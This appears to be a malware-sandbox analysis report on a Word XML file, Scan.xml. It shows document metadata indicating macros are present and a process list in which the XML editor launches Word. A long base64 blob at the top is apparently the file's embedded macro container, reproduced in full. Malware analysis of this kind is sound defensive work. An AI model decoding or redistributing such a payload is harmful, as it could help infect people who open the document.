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 eD==
WordDocumentDocSuppDataBinDataName:	editdata.mso
WordDocumentStylesStyleRPrRFontsCs:	Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi:	Tahoma
WordDocumentStylesStyleRPrRFontsAscii:	Tahoma
WordDocumentStylesStyleRsidVal:	005A24B1
WordDocumentStylesStyleLinkVal:	BalloonTextChar
WordDocumentStylesStyleBasedOnVal:	Normal
WordDocumentStylesStyleTblPrTblCellMarRightType:	dxa
WordDocumentStylesStyleTblPrTblCellMarRightW:	108
WordDocumentStylesStyleTblPrTblCellMarBottomType:	dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW:	-
WordDocumentStylesStyleTblPrTblCellMarLeftType:	dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW:	108
WordDocumentStylesStyleTblPrTblCellMarTopType:	dxa
WordDocumentStylesStyleTblPrTblCellMarTopW:	-
WordDocumentStylesStyleTblPrTblIndType:	dxa
WordDocumentStylesStyleTblPrTblIndW:	-
WordDocumentStylesStyleUiNameVal:	Table Normal
WordDocumentStylesStyleRPrLangBidi:	AR-SA
WordDocumentStylesStyleRPrLangFareast:	EN-US
WordDocumentStylesStyleRPrLangVal:	EN-US
WordDocumentStylesStyleRPrSz-csVal:	22
WordDocumentStylesStyleRPrSzVal:	22
WordDocumentStylesStyleRPrFontVal:	Calibri
WordDocumentStylesStylePPrSpacingLine-rule:	auto
WordDocumentStylesStylePPrSpacingLine:	259
WordDocumentStylesStylePPrSpacingAfter:	160
WordDocumentStylesStyleNameVal:	Normal
WordDocumentStylesStyleStyleId:	Normal
WordDocumentStylesStyleDefault:	on
WordDocumentStylesStyleType:	paragraph
WordDocumentStylesLatentStylesLsdExceptionName:	Normal
WordDocumentStylesLatentStylesLatentStyleCount:	375
WordDocumentStylesLatentStylesDefLockedState:	off
WordDocumentStylesVersionOfBuiltInStylenamesVal:	7
WordDocumentFontsFontSigCsb-1:	00000000
WordDocumentFontsFontSigCsb-0:	000001FF
WordDocumentFontsFontSigUsb-3:	00000000
WordDocumentFontsFontSigUsb-2:	00000009
WordDocumentFontsFontSigUsb-1:	C0007841
WordDocumentFontsFontSigUsb-0:	E0002AFF
WordDocumentFontsFontPitchVal:	variable
WordDocumentFontsFontFamilyVal:	Roman
WordDocumentFontsFontCharsetVal:	00
WordDocumentFontsFontPanose-1Val:	02020603050405020304
WordDocumentFontsFontName:	Times New Roman
WordDocumentFontsDefaultFontsCs:	Times New Roman
WordDocumentFontsDefaultFontsH-ansi:	Calibri
WordDocumentFontsDefaultFontsFareast:	Calibri
WordDocumentFontsDefaultFontsAscii:	Calibri
WordDocumentDocumentPropertiesVersion:	16
WordDocumentDocumentPropertiesCharactersWithSpaces:	1
WordDocumentDocumentPropertiesParagraphs:	1
WordDocumentDocumentPropertiesLines:	1
WordDocumentDocumentPropertiesCharacters:	1
WordDocumentDocumentPropertiesWords:	-
WordDocumentDocumentPropertiesPages:	1
WordDocumentDocumentPropertiesLastSaved:	2019:01:22 21:49:00Z
WordDocumentDocumentPropertiesCreated:	2019:01:22 21:49:00Z
WordDocumentDocumentPropertiesTotalTime:	-
WordDocumentDocumentPropertiesRevision:	1
WordDocumentIgnoreSubtreeVal:	http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent:	no
WordDocumentEmbeddedObjPresent:	no
WordDocumentMacrosPresent:	yes

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
2864	"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\Scan.xml"	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XML Editor Exit code: 0 Version: 14.0.4750.1000
2288	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Scan.xml"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	MSOXMLED.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
